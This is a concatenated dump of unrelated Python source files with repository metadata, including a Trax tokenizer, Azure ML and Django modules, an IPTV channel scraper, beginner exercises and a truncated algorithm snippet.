soup = BeautifulSoup(html, "html.parser")
tags = soup.find("video", id="vid_html5_api")
if tags != None:
# print("no video")
source = tags.find('source')
url = source['src']
print("video " + url)
await request_url.download(url)
return
tags = soup.find("textarea", id="fm-video_link")
if tags == None:
print("no video")
return
# source = tags.find('source')
url = tags.get_text()
print("video "+url)
# await request_url.download(url)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(start())
loop.close() | [
"792017657@qq.com"
] | 792017657@qq.com |
8eea72b5dccb4559dd298a63072bd2e7518423b9 | 523e0d1edf4478245b8506e0cb594bfb8a1b1883 | /components/dimensionality_reduction/pca_entry.py | e4fc1774fc981ef8a62fa290de98a491ac7f8d75 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LicenseRef-scancode-proprietary-license",
"CC-BY-4.0"
] | permissive | luzhang06/AzureMachineLearningGallery | b971676503d897dc9bd895d4a95121e398c53b74 | f48916118ffee8cb44ae60b7a0a0fb18d9094034 | refs/heads/main | 2023-02-15T21:58:52.475671 | 2021-01-18T02:02:14 | 2021-01-18T02:02:14 | 305,295,403 | 0 | 0 | MIT | 2021-01-18T01:17:13 | 2020-10-19T07:16:06 | Python | UTF-8 | Python | false | false | 2,282 | py | # pylint: disable=E1136,W1202,R0801,R0913,W0613,R0914
""" Dimensionality reduction entry module"""
from pathlib import Path
import joblib
from azureml.studio.core.logger import module_logger as logger
from azureml.studio.core.utils.fileutils import ensure_folder
from azureml.studio.core.io.data_frame_directory\
import load_data_frame_from_directory, save_data_frame_to_directory
from azureml.studio.core.io.model_directory import save_model_to_directory
from azureml.studio.core.data_frame_schema import DataFrameSchema
from pca_module import PCAModule
from module_params import pca_parser
def pca_module_dumper(data, file_name=None):
'''
Return a dumper to dump a model with pickle.
args:
data: transformer instance to serialize
filername:str file name to write to
'''
if not file_name:
file_name = '_pca.pkl'
def model_dumper(save_to):
full_path = Path(save_to) / file_name
ensure_folder(Path(save_to))
with open(full_path, 'wb') as fout:
joblib.dump(data, fout, protocol=4)
model_spec = {'model_type': 'joblib', 'file_name': file_name}
return model_spec
return model_dumper
def main(args):
'''
Module entry function
args:
args:list transformer parameters requested by user/
'''
logger.debug(f'input-dir {args.input_dir}')
logger.debug(f'output-dir {args.output_dir}')
logger.debug(f'model output dir {args.model_output_dir}')
input_df = load_data_frame_from_directory(args.input_dir).data
logger.debug(f'{input_df.describe()}\n shape{input_df.shape} ')
pca_module = PCAModule(args)
logger.debug(pca_module.pca_instance)
output_df = pca_module.fit_transform(input_df)
pca_module.log_metrics(input_df.columns)
logger.debug(f'output shape {output_df.shape}')
save_data_frame_to_directory(save_to=args.output_dir,
data=output_df,
schema=DataFrameSchema.data_frame_to_dict(output_df))
save_model_to_directory(save_to=args.model_output_dir,
model_dumper=pca_module_dumper(data=pca_module))
if __name__ == '__main__':
ARGS, _ = pca_parser().parse_known_args()
main(ARGS)
| [
"keli19@microsoft.com"
] | keli19@microsoft.com |
048c333f5f321f508763e1bc3d96c4ec5a465231 | 3bddb2814881bb5e4679de3d31ac0bde57b86148 | /trax/data/tokenizer.py | 64081f4da0735026efb1c20851a2a900e708ad02 | [
"Apache-2.0"
] | permissive | google/trax | 7a2b1a83eb8848136a5f5e07988efcef2f0b704f | 1bb3b89427f669f2f0ec84633952e21b68964a23 | refs/heads/master | 2023-08-30T22:36:09.651644 | 2023-03-29T01:14:20 | 2023-03-29T01:15:47 | 213,020,264 | 8,180 | 917 | Apache-2.0 | 2023-08-29T14:30:03 | 2019-10-05T15:09:14 | Python | UTF-8 | Python | false | false | 5,810 | py | # coding=utf-8
# Copyright 2022 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simple invertible tokenizer.
Converts from a unicode string to a list of tokens
(represented as Unicode strings).
This tokenizer has the following desirable properties:
- It is invertible.
- Alphanumeric characters are broken away from non-alphanumeric characters.
- A single space between words does not produce an extra token.
- The full Unicode punctuation and separator set is recognized.
The tokenization algorithm is as follows:
1. Split the text into a list of tokens, splitting at every boundary of an
alphanumeric character and a non-alphanumeric character. This produces
a list which alternates between "alphanumeric tokens"
(strings of alphanumeric characters) and "non-alphanumeric tokens"
(strings of non-alphanumeric characters).
2. Remove every token consisting of a single space, unless it is
the very first or very last token in the list. These tokens are now
implied by the fact that there are two adjacent alphanumeric tokens.
e.g. u"Dude - that's so cool."
-> [u"Dude", u" - ", u"that", u"'", u"s", u"so", u"cool", u"."]
"""
import collections
import sys
import unicodedata
from absl import logging
import six
import tensorflow as tf
# This set contains all letter and number characters.
_ALPHANUMERIC_CHAR_SET = set(
six.unichr(i) for i in range(sys.maxunicode)
if (unicodedata.category(six.unichr(i)).startswith("L") or
unicodedata.category(six.unichr(i)).startswith("N")))
def encode(text):
"""Encode a unicode string as a list of tokens.
Args:
text: a unicode string
Returns:
a list of tokens as Unicode strings
"""
if not text:
return []
ret = []
token_start = 0
# Classify each character in the input string
is_alnum = [c in _ALPHANUMERIC_CHAR_SET for c in text]
for pos in range(1, len(text)):
if is_alnum[pos] != is_alnum[pos - 1]:
token = text[token_start:pos]
if token != u" " or token_start == 0:
ret.append(token)
token_start = pos
final_token = text[token_start:]
ret.append(final_token)
return ret
def decode(tokens):
"""Decode a list of tokens to a unicode string.
Args:
tokens: a list of Unicode strings
Returns:
a unicode string
"""
token_is_alnum = [t[0] in _ALPHANUMERIC_CHAR_SET for t in tokens]
ret = []
for i, token in enumerate(tokens):
if i > 0 and token_is_alnum[i - 1] and token_is_alnum[i]:
ret.append(u" ")
ret.append(token)
return "".join(ret)
def _read_filepattern(filepattern, max_lines=None, split_on_newlines=True):
"""Reads files matching a wildcard pattern, yielding the contents.
Args:
filepattern: A wildcard pattern matching one or more files.
max_lines: If set, stop reading after reading this many lines.
split_on_newlines: A boolean. If true, then split files by lines and strip
leading and trailing whitespace from each line. Otherwise, treat each
file as a single string.
Yields:
The contents of the files as lines, if split_on_newlines is True, or
the entire contents of each file if False.
"""
filenames = sorted(tf.io.gfile.glob(filepattern))
lines_read = 0
for filename in filenames:
with tf.io.gfile.GFile(filename) as f:
if split_on_newlines:
for line in f:
yield line.strip()
lines_read += 1
if max_lines and lines_read >= max_lines:
return
else:
if max_lines:
doc = []
for line in f:
doc.append(line)
lines_read += 1
if max_lines and lines_read >= max_lines:
yield "".join(doc)
return
yield "".join(doc)
else:
yield f.read()
def corpus_token_counts(
text_filepattern, corpus_max_lines, split_on_newlines=True):
"""Read the corpus and compute a dictionary of token counts.
Args:
text_filepattern: A pattern matching one or more files.
corpus_max_lines: An integer; maximum total lines to read.
split_on_newlines: A boolean. If true, then split files by lines and strip
leading and trailing whitespace from each line. Otherwise, treat each
file as a single string.
Returns:
a dictionary mapping token to count.
"""
counts = collections.Counter()
for doc in _read_filepattern(
text_filepattern,
max_lines=corpus_max_lines,
split_on_newlines=split_on_newlines):
counts.update(encode(doc))
return counts
def vocab_token_counts(text_filepattern, max_lines):
"""Read a vocab file and return a dictionary of token counts.
Reads a two-column CSV file of tokens and their frequency in a dataset. The
tokens are presumed to be generated by encode() or the equivalent.
Args:
text_filepattern: A pattern matching one or more files.
max_lines: An integer; maximum total lines to read.
Returns:
a dictionary mapping token to count.
"""
ret = {}
for i, line in enumerate(
_read_filepattern(text_filepattern, max_lines=max_lines)):
if "," not in line:
logging.warning("Malformed vocab line #%d '%s'", i, line)
continue
token, count = line.rsplit(",", 1)
ret[token] = int(count)
return ret
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
b51f2032a01f2a225afeaa4e57adc9645034c1a5 | a586b39403bbf5c0b1637b445af64aa6ef7ea99c | /pythonkurs/fonksiyonlar.py | 804ea19e36f4950deae03542b2c9c00dc7509795 | [] | no_license | bkucukala/PYTHON_WORKSHOP | f663b98a6cb6f7cf271f3bceb62900fb57fb4a39 | 83c618a833b35b712c5ab70bce07ef8b724a9524 | refs/heads/main | 2023-05-31T18:11:07.651748 | 2021-06-19T20:18:32 | 2021-06-19T20:18:32 | 345,985,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | # -*- coding: utf-8 -*-
def hosgeldin():
print("Mekana hoşgeldiniz....")
print(hosgeldin())
#%%
def hosgeldin2(isim):
print("Mekana hoşgeldin....",isim)
print(hosgeldin2("Ahmet"))
#%%
def topla(x,y):
print("Toplamları:",x+y)
print(topla(7, 11))
#%%
def faktoriyel(sayı):
a = 1
if (sayı == 1):
print("Sonuç: 1 ")
elif (sayı == 0):
print("Sonuç: 1")
while (sayı > 1):
a = a * sayı
sayı -= 1
print("Sonuç: ",a)
print(faktoriyel(5))
| [
"bkucukala@hotmail.com"
] | bkucukala@hotmail.com |
5450fe5117edb58e6caaa558a061d096623c0f50 | 3fa3d253c9ec93776bdc67f3ecbb7144d20e8b4f | /typegql/execution.py | 06e2a77e96e9ce12a63e596b4e775e1fe5af05c2 | [] | no_license | cipriantarta/typegql | 8607b2595b3b59a49a28acbe9e680dee72d3855f | cf1b1c25b421ceb8d0f8b5cc77dd04d31de8bc42 | refs/heads/master | 2021-07-24T17:24:35.451046 | 2020-04-06T11:46:22 | 2020-04-06T11:46:22 | 131,473,262 | 14 | 1 | null | 2020-01-13T15:34:21 | 2018-04-29T07:01:54 | Python | UTF-8 | Python | false | false | 1,193 | py | from typing import Any, Sequence, Union
from graphql import (
ExecutionContext,
FieldNode,
GraphQLError,
GraphQLField,
GraphQLFieldResolver,
GraphQLResolveInfo,
is_introspection_type,
)
from graphql.execution.values import get_argument_values
from typegql.builder.utils import to_snake
class TGQLExecutionContext(ExecutionContext):
def resolve_field_value_or_error(
self,
field_def: GraphQLField,
field_nodes: Sequence[FieldNode],
resolve_fn: GraphQLFieldResolver,
source: Any,
info: GraphQLResolveInfo,
) -> Union[Exception, Any]:
try:
is_introspection = is_introspection_type(info.parent_type)
camelcase = getattr(info.schema, "camelcase", False)
arguments = get_argument_values(
field_def, field_nodes[0], self.variable_values
)
if camelcase and not is_introspection:
arguments = to_snake(arguments=arguments)
result = resolve_fn(source, info, **arguments)
return result
except GraphQLError as e:
return e
except Exception as e:
return e
| [
"ciprian@cipriantarta.ro"
] | ciprian@cipriantarta.ro |
b64ec8ccaf0a47dd9f85266b92faf3122e5e57ff | 6896fce8ee082f9730c056436e49ef0d16a6ea03 | /exception/exceptions.py | cbec08fae3c703e147a7daef31cd584579c057d3 | [] | no_license | Sugeei/python-practice | 5022ae7c34bc04972edebc15936248cb9869ec54 | 048df40500a059e4380f3ecc2581de96c9a1fc9b | refs/heads/master | 2022-12-07T06:34:40.740379 | 2022-11-13T11:48:29 | 2022-11-13T11:48:29 | 121,074,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 854 | py | from bs4 import BeautifulSoup
ERROR_MAP = {
"200000": "invalid input parameter",
"500000": "load data error",
"600000": "dump data error",
"700000": "data verify error",
"800000": "algorithm error"
}
class UranusError(Exception):
def __init__(self, error_code=None, message=''):
Exception.__init__(self,
'%s%s' % (ERROR_MAP[error_code] if ERROR_MAP.get(
error_code) is not None else '', message))
self.error_code = error_code
# assertion
# https://realpython.com/python-exceptions/
def divide(a, b):
try:
r = a / b
except:
raise ValueError
else: # no exceptions , run this code
print('divide result is %s' % r)
finally: # always run this code
print("done")
# divide(4,0)
print('--------')
divide(4,1) | [
"215626824@qq.com"
] | 215626824@qq.com |
7b4ea0f4ff1d23cb5acb9a1696155e58d41a06ed | deb3c16ef887b6c496b8c920809d79b9f73aa2fe | /libs/telewizjaonline.py | 3ff44fd184c1e68bbc06dccfa2babf9394c94358 | [] | no_license | Yaser7440/cmdline_iptvplayer | 1ea35f4fd36c708176a43d402a49342c4cf723a5 | 4e287021d86cab8d6525262b647d144c6141d6b1 | refs/heads/master | 2021-01-24T10:49:29.278730 | 2016-09-21T09:24:26 | 2016-09-21T09:24:26 | null | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 4,018 | py | # -*- coding: utf-8 -*-
###################################################
# LOCAL import
###################################################
from Plugins.Extensions.IPTVPlayer.dToolsSet.iptvplayerinit import TranslateTXT as _
from Plugins.Extensions.IPTVPlayer.dToolsSet.iptvtools import printDBG, printExc, GetCookieDir
from Plugins.Extensions.IPTVPlayer.tools.iptvtypes import strwithmeta
from Plugins.Extensions.IPTVPlayer.libs.pCommon import common
from Plugins.Extensions.IPTVPlayer.libs.urlparser import urlparser
###################################################
###################################################
# FOREIGN import
###################################################
from Components.config import config, ConfigSelection, ConfigYesNo, ConfigText, getConfigListEntry
import re
try: import simplejson as json
except: import json
from os import path as os_path
############################################
###################################################
# E2 GUI COMMPONENTS
###################################################
from Plugins.Extensions.IPTVPlayer.components.asynccall import MainSessionWrapper
###################################################
###################################################
# Config options for HOST
###################################################
config.plugins.iptvplayer.telewizjaonline_sort = ConfigSelection(default = "date", choices = [("date", "Date"), ("ostatnio-ogladane", "ostatnio oglądane"), ("title", "Title"), ("view", "Views"), ("like", "Likes"), ("comment", "Comments")])
def GetConfigList():
optionList = []
optionList.append(getConfigListEntry("Sortuj kanały według:", config.plugins.iptvplayer.telewizjaonline_sort))
return optionList
###################################################
class TelewizjaOnline:
MAINURL = 'http://telewizja-online.pl/'
HTTP_HEADER = { 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0', 'Referer': MAINURL }
def __init__(self):
self.cm = common()
self.up = urlparser()
def getCategoriesList(self):
printDBG("TelewizjaOnline.getCategoriesList")
catsList = []
sts,data = self.cm.getPage(TelewizjaOnline.MAINURL)
if not sts: return catsList
data = self.cm.ph.getDataBeetwenMarkers(data, 'Kategorie Stacji TV', '</ul>', False)[1]
data = re.compile('<a[^>]+?href="([^"]+?)"[^>]*?>([^<]+?)<').findall(data)
for item in data:
catsList.append({'url':item[0], 'title':item[1]})
return catsList
def getChannelsList(self, baseUrl):
printDBG("TelewizjaOnline.getChannelsList baseUrl[%s]" % baseUrl )
channelsList = []
url = baseUrl + '?orderby=' + config.plugins.iptvplayer.telewizjaonline_sort.value
sts,data = self.cm.getPage(url)
if not sts: return channelsList
data = self.cm.ph.getDataBeetwenMarkers(data, '<div class="col-md-3', '<center>', False)[1]
data = data.split('<div class="col-md-3')
for item in data:
title = self.cm.ph.getSearchGroups(item, 'title="([^"]+?)"')[0]
url = self.cm.ph.getSearchGroups(item, 'href="([^"]+?)"')[0]
icon = self.cm.ph.getSearchGroups(item, 'src="(http[^"]+?)"')[0]
channelsList.append({'title':title, 'url':url, 'icon':icon})
return channelsList
def getVideoLink(self, baseUrl):
printDBG("TelewizjaOnline.getVideoLink url[%s]" % baseUrl)
def _url_path_join(a, b):
from urlparse import urljoin
return urljoin(a, b)
sts,data = self.cm.getPage(baseUrl)
if not sts: return []
data = self.cm.ph.getDataBeetwenMarkers(data, '<div id="player-embed">', '<div class="player-button">', False)[1]
url = self.cm.ph.getSearchGroups(data, '<iframe[^>]+?src="([^"]+?)"')[0]
if '' != url:
data = None
return self.up.getAutoDetectedStreamLink(url, data)
| [
"zdzislaw22@windowslive.com"
] | zdzislaw22@windowslive.com |
42c98f0b561f8d2986b82ba15ae715161e168de9 | bca8fa75d214db54ab436014bb4bfc55f5df360c | /main/admin.py | ed19c663a8825d68491ebe3f78791cd64ecea49d | [] | no_license | daniiarandashov/resto | aa0d031d9e6ab49fce37f785bca16c567d862f3f | b5fe1789e1bbeaa869e559f3cb821124797cd94e | refs/heads/master | 2023-02-17T16:24:36.335840 | 2021-01-16T12:00:06 | 2021-01-16T12:00:06 | 330,132,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | from django.contrib import admin
from .models import UserProfile,Feedback,Comment
admin.site.register(UserProfile)
admin.site.register(Feedback)
admin.site.register(Comment)
| [
"daniiarandashov@gmail.com"
] | daniiarandashov@gmail.com |
ceb28f20a61e6dbcb21f99d264dc43cef9224028 | 8fc944deb49190afb54116f67e7de430dc0d96ba | /read_data/library_size_normalization.py | 1b9bdad930ad4f24326880eb9d528fb655f6f708 | [
"MIT"
] | permissive | fuhrmanj/TRANSACT_manuscript | 9cafa6727d314d9ac92fc19a9235f4f97488e950 | 71ca2ec42bdd5d547d4b965aa7f84838bfd5b812 | refs/heads/main | 2023-01-09T22:57:59.223066 | 2020-10-12T08:24:45 | 2020-10-12T08:24:45 | 310,045,794 | 0 | 0 | MIT | 2020-11-04T15:40:58 | 2020-11-04T15:40:57 | null | UTF-8 | Python | false | false | 2,308 | py | import numpy as np
from sklearn.preprocessing import StandardScaler
import rpy2
import rpy2.robjects as robjects
import rpy2.robjects.numpy2ri
from rpy2.robjects.packages import importr
class NormalizationParameter():
def __init__(self, parameters=None, scaler=None):
self.parameters = parameters
self.scaler = scaler
pass
def TMM_normalization(count_data, return_instance=False, coef=None):
"""
Use TMM for library size normalization. Makes use of an R wrapper to call
edgeR and perform the library size norm.
-------
count_data: np.ndarray (int or float)
Genomic matrix with samples in the rows.
return_instance: bool, default to False
Whether should return NormalizationParameter, useful for remembering the
computed normalization parameters.
coef: NormalizationParameter, default to None
Normalization coefficients already computed. If not None, then the software
will not compute coefficients and put coef as given here.
Returned Values
-------
np.ndarray with samples in the rows.
"""
coef = coef or NormalizationParameter()
#Custom import
rpy2.robjects.numpy2ri.activate()
importr('edgeR')
#Transform the input count data and feed it to R
n_samples, n_genes = count_data.shape
count_cell_lines_R = robjects.r.matrix(count_data.transpose(), nrow=n_genes, ncol=n_samples)
robjects.r.assign("count_data", count_cell_lines_R)
# Recompute the coefficients is asked, use precomputed otherwise
robjects.r('''
D <- DGEList(counts=count_data)
''')
if coef.parameters is None:
robjects.r('''
#TMM normalization
Dnorm <- calcNormFactors(D)
''')
coef.parameters = robjects.r["Dnorm"]
else:
robjects.r.assign('Dnorm', coef.parameters)
#Run TMM normalization with API
X_TMM = robjects.r('''
rellibsize <- colSums(D$counts)/exp(mean(log(colSums(D$counts))))
nf = Dnorm$samples[,3]*rellibsize
TMM_normalized_data = round(sweep(D$counts, 2, nf, "/"))
''')
if not return_instance:
#Transpose it back to have it in a scikit-learn format
return X_TMM.transpose()
return X_TMM.transpose(), coef | [
"soufiane.mourragui@free.fr"
] | soufiane.mourragui@free.fr |
3bb772842726bdb60f03a1314d320bb52bd637ee | b721a2744096c5cc44d22eb303e0fc288c8c3679 | /contact/migrations/0001_initial.py | c814fc5c68537ffee6dfcae8d9e3d6727a3a64b5 | [] | no_license | Rasel120/Python-blog-project | 91cacdb12834bbcfea2b9b3a64153952d94d5d04 | 20e1561d06eb9ab6144bb50101b061acf9680914 | refs/heads/main | 2023-06-05T08:22:25.509881 | 2021-06-17T09:21:04 | 2021-06-17T09:21:04 | 375,974,709 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,210 | py | # Generated by Django 3.2.4 on 2021-06-16 11:35
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='contact',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('email', models.TextField(max_length=30)),
('subject', models.TextField(max_length=80)),
('description', models.TextField(max_length=900)),
],
),
migrations.CreateModel(
name='information',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('location', models.CharField(max_length=80)),
('email', models.TextField(max_length=30)),
('email2', models.TextField(max_length=30)),
('call', models.CharField(max_length=15)),
('call2', models.CharField(max_length=15)),
],
),
]
| [
"raselhossain120@gmail.com"
] | raselhossain120@gmail.com |
a832096e542afe309fcca3c34230d78766301154 | 2ffbdaca744e6a842db4dd811688508855a20e32 | /venv/bin/easy_install-2.7 | a60f31fbc646ca78e84bbe39ff4040f9dfb33442 | [] | no_license | mparavak/Hackathon-79 | c3ba245a2497454b5706348e13c23036defd39ce | b92fab045b8fd5ab569ec6c829a6c3227fd7a8f8 | refs/heads/master | 2020-09-09T16:29:06.530563 | 2019-11-15T08:42:01 | 2019-11-15T08:42:01 | 221,496,319 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | 7 | #!/Users/mparavak/Play-ground/hackathone/venv/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"mparavak@cisco.com"
] | mparavak@cisco.com |
ea1e5c9e5b85c1fa79f1cb44ff6cdb596859bb30 | f9b85ca1565bad4da34a99edd0a3ddf555b3beb1 | /Python/Python_Exercise/Python_Exercise1/ex35.py | f3e8b5f0f8f7b336dcf696ff3ed5bc785b95fa5a | [] | no_license | akjadon/HH | baab2209fbeee80625c451e66606cad4c7a0a4f5 | f6664c62c62811e280e1460241936cb526974661 | refs/heads/master | 2023-05-15T00:01:34.580015 | 2023-05-07T15:44:25 | 2023-05-07T15:44:25 | 191,207,450 | 56 | 76 | null | 2022-06-22T05:07:51 | 2019-06-10T16:43:35 | Jupyter Notebook | UTF-8 | Python | false | false | 2,507 | py | """The International Civil Aviation Organization (ICAO) alphabet assigns
code words to the letters of the English alphabet acrophonically
(Alfa for A, Bravo for B, etc.) so that critical combinations of letters
(and numbers) can be pronounced and understood by those who transmit and
receive voice messages by radio or telephone regardless of their native
language, especially when the safety of navigation or persons is essential.
Here is a Python dictionary covering one version of the ICAO alphabet:
d = {'a':'alfa', 'b':'bravo', 'c':'charlie', 'd':'delta', 'e':'echo',
'f':'foxtrot', 'g':'golf', 'h':'hotel', 'i':'india', 'j':'juliett',
'k':'kilo', 'l':'lima', 'm':'mike', 'n':'november', 'o':'oscar',
'p':'papa', 'q':'quebec', 'r':'romeo', 's':'sierra', 't':'tango',
'u':'uniform', 'v':'victor', 'w':'whiskey', 'x':'x-ray', 'y':'yankee',
'z':'zulu'}
Your task in this exercise is to write a procedure speak_ICAO() able to
translate any text (i.e. any string) into spoken ICAO words. You need to
import at least two libraries: os and time. On a mac, you have access to
the system TTS (Text-To-Speech) as follows: os.system('say ' + msg), where
msg is the string to be spoken. (Under UNIX/Linux and Windows, something
similar might exist.) Apart from the text to be spoken, your procedure
also needs to accept two additional parameters: a float indicating the
length of the pause between each spoken ICAO word, and a float indicating
the length of the pause between each word spoken."""
import time, os
from string import punctuation
d = {'a':'alfa', 'b':'bravo', 'c':'charlie', 'd':'delta', 'e':'echo',
'f':'foxtrot', 'g':'golf', 'h':'hotel', 'i':'india', 'j':'juliett',
'k':'kilo', 'l':'lima', 'm':'mike', 'n':'november', 'o':'oscar',
'p':'papa', 'q':'quebec', 'r':'romeo', 's':'sierra', 't':'tango',
'u':'uniform', 'v':'victor', 'w':'whiskey', 'x':'x-ray', 'y':'yankee',
'z':'zulu'}
def icao(txt, icao_pause=1, word_pause=3):
words = txt.split() # Take each word from provided string
for word in words: # For every word in the provided string
for char in word: # For every character in the word
if char not in punctuation: # If this character is not a punctuation. Do our business
os.system('say ' + d[char.lower()])
time.sleep(icao_pause) # The wait time after every letter
time.sleep(word_pause) # The wait time after every word
#test
icao("Hello world, hi, I'm Nick!", 0.10, 1)
icao("The quick brown Fox jumps over the laZy Dog!") | [
"aniljadon.jadon@gmail.com"
] | aniljadon.jadon@gmail.com |
a3ef5a797e9f1b6569ec306baa65e43624e201b4 | 2a57bbf56f1a132cd401f9f6280a14031b50d2f2 | /Ecommerce/users/migrations/0001_initial.py | 5196bd6b9f550386ace7ce7e59bb538412251fe5 | [] | no_license | harshpjoshi/Django-Projects | 1664738e89d92c90b49638d7670bd1c44fe79c7a | 561b7b0ab25275d8c2bcf1c0ab92e84ac40182ab | refs/heads/master | 2020-07-02T05:28:30.006458 | 2019-08-09T08:08:47 | 2019-08-09T08:08:47 | 201,426,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # Generated by Django 2.2.4 on 2019-08-04 12:55
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(default='default.jpg', upload_to='profile_pics')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"harshjoshi989@gmail.com"
] | harshjoshi989@gmail.com |
5b8d8fd74c0847bd79b0fb380de54ed2ea9f6bb2 | e027a6aacf256bee8abf2eafc82b7fd4b879f3d6 | /Crud/forms.py | 997fe7754a2d06f01f7d828f538de218bb068375 | [] | no_license | Yelzhan04/CrudApi | 5094e4c911adc05973df106ff474cca2109dc306 | 877e56625e566111b8add045e1be1d7c51f7b908 | refs/heads/master | 2022-09-09T20:01:24.300112 | 2020-05-23T21:52:05 | 2020-05-23T21:52:05 | 266,425,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | from django import forms
from .models import Post
class PostForm(forms.ModelForm):
class Meta:
model=Post
fields="__all__"
| [
"eljan00.kz@gmail.com"
] | eljan00.kz@gmail.com |
7782bfdeeddfc565dde400c5cb74f00a511883a0 | 28bb6f38b61f72cbebfed156a4edd7424ef204cf | /shipping/admin.py | 20cf06efb29fd87592037033a07f92a96cd17ad5 | [] | no_license | hodortaras/Test_red | 7ebe7bffc1866de7b77eaec4b07eae52e582eef8 | 806d485290a5be7c494797e15fcc64ff8ee2a49a | refs/heads/master | 2022-11-24T05:46:56.096128 | 2020-01-21T22:14:16 | 2020-01-21T22:14:16 | 235,436,866 | 0 | 0 | null | 2022-11-22T05:15:35 | 2020-01-21T20:38:17 | JavaScript | UTF-8 | Python | false | false | 482 | py | from django.contrib import admin
from .models import Order, OrderItem
class OrderItemInline(admin.TabularInline):
model = OrderItem
raw_id_fields = ['product']
class OrderAdmin(admin.ModelAdmin):
list_display = ['id', 'name', 'email',
'address', 'phone', 'paid',
'created', 'updated', 'shipping_options']
list_filter = ['paid', 'created', 'updated']
inlines = [OrderItemInline]
admin.site.register(Order, OrderAdmin)
| [
"dvalindvorf@gmail.com"
] | dvalindvorf@gmail.com |
651a8d2fb009e24b0791b25c910e348e012e7af6 | dca23c8d1f8014e7f992b9afdcbb130aababc1f9 | /test_functions.py | 3e5ef178a1a0e6bdec3a222dd059ce115b9238d8 | [] | no_license | anshulsinghh/hoursonleague | 8c422534d5c8a5a0c5567f4c09fbdb809383e3e0 | c732f69186c0b168bc9de2a37e762f64d3cd1d4b | refs/heads/master | 2021-04-23T12:31:49.549185 | 2020-07-25T22:47:06 | 2020-07-25T22:47:06 | 249,925,571 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,556 | py | from datetime import timedelta
from module import get_analysis, get_hours_and_minutes\
"""
This function tests the get_analysis function in the module file
"""
def test_get_analysis():
assert callable(get_analysis) # Check if the function is callable
# Check that for inputs from 0 to 14, that the output is a string
for i in range(0, 15):
assert isinstance(get_analysis(i), str)
# These strings are used to test if the outputs of the function are correct
did_well = '\n😁 Great Job! Looks like you have been really' + \
' productive last week.'
did_alright = '\n🙂 Looks like you have been pretty productive last ' + \
'week. You might want to limit your hours for next week to' + \
' increase productivity even more!'
did_poorly = '\n😦 Seems like you play a lot! Definitely try limiting ' + \
'your hours to be more productive.'
did_horrible = '\n😡 You should really limit your hours, you probably' + \
' cannot get much work done if you play this much.'
# For any input less than 2, the string did_well should be returned
for i in range (-20, 2):
assert get_analysis(i) == did_well
# For any input >= 2 and < 6, the string did_alright should be returned
for i in range(2, 6):
assert get_analysis(i) == did_alright
# For any input >= 6 and < 11, the string did_poorly should be returned
for i in range(6, 11):
assert get_analysis(i) == did_poorly
# For any input >= 11 and < 20, the string did_horrible should be returned
for i in range(11, 20):
assert get_analysis(i) == did_horrible
# Test that the proper values are still returned with floating point values
assert get_analysis(1.2) == did_alright
assert get_analysis(10.2) == did_horrible
assert get_analysis(8.2) == did_poorly
"""
This function tests the get_hours_and_minutes function in the module file
"""
def test_get_hours_and_minutes():
assert callable(get_hours_and_minutes) # CHeck if the function is callable
# Loop through hours from -100 to 99
for hours in range(-100, 100):
# Loop through minutes from 0 to 59 (if minutes = 60 it will wrap around to
# be a new hour)
for minutes in range(0, 60):
# Create a new timedelta object
delta = timedelta(hours=hours, minutes=minutes)
#Check that the hours and minutes match
assert get_hours_and_minutes(delta) == [hours, minutes]
#Check that the value returned is a list
assert isinstance(get_hours_and_minutes(delta), list) | [
"noreply@github.com"
] | noreply@github.com |
070089d8c74b1601136b1786b5a6ae80947ded2f | 5a22329b0cd51c49546e5f6084a8879c5a4a57c4 | /greedy/maximum_water_trapped.py | 1ecd9d1a19afb6600e40b74df5d9cc1306b807bd | [] | no_license | rmarren1/code_problem_snippets | b352a76cb130755745b9c30372b028aaf28ad901 | 6f6ef401fa8e90c6ae6e044b3cc30531427adc46 | refs/heads/master | 2020-04-09T03:21:38.670944 | 2019-01-27T18:45:08 | 2019-01-27T18:45:08 | 159,979,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | def max_water_trapped(walls):
l, r = 0, len(walls) - 1
most_water = 0
while l < r:
most_water = max(most_water, (r - l) * min(walls[l], walls[r]))
if walls[l] < walls[r]:
l += 1
else:
r -= 1
return most_water
def main():
test_cases = [
